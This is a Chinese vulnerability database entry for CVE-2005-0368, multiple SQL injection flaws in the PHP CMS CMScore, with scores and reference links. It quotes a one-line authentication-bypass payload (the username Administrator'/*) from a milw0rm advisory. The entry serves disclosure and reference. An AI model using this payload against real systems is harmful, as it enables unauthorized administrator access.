CMScore 多个SQL注入漏洞

CMScore 多个SQL注入漏洞

漏洞ID 1108450 漏洞类型 SQL注入
发布时间 2005-02-10 更新时间 2005-10-20
图片[1]-CMScore 多个SQL注入漏洞-安全小百科CVE编号 CVE-2005-0368
图片[2]-CMScore 多个SQL注入漏洞-安全小百科CNNVD-ID CNNVD-200505-424
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/808
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-424
|漏洞详情
CMScore存在多个SQL注入漏洞。远程攻击者可以通过index.php的(1)EntryID或(2)searchterm参数,或者authenticate.php的(3)username参数来执行任意SQL命令。
|漏洞EXP
/*==========================================*/
// GHC -> CMS CORE <- ADVISORY
// Product: CMS Core
// URL: http://chipmunk-scripts.com/scripts/cmscore.php
// VULNERABILITY CLASS: SQL injection
/*==========================================*/

[exploit]
Log in with username
Administrator'/*
from admin/index.php page.

# milw0rm.com [2005-02-10]
|参考资料

来源:XF
名称:cmscore-multiple-sql-injection(19235)
链接:http://xforce.iss.net/xforce/xfdb/19235
来源:BID
名称:12457
链接:http://www.securityfocus.com/bid/12457
来源:SECUNIA
名称:14142
链接:http://secunia.com/advisories/14142/
来源:BUGTRAQ
名称:20050209CMSCoreSQLinjection
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110803385223054&w;=2

相关推荐: PHPSysInfo Index.PHP File Disclosure Vulnerability

PHPSysInfo Index.PHP File Disclosure Vulnerability 漏洞ID 1100514 漏洞类型 Input Validation Error 发布时间 2003-04-03 更新时间 2003-04-03 CVE编号 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享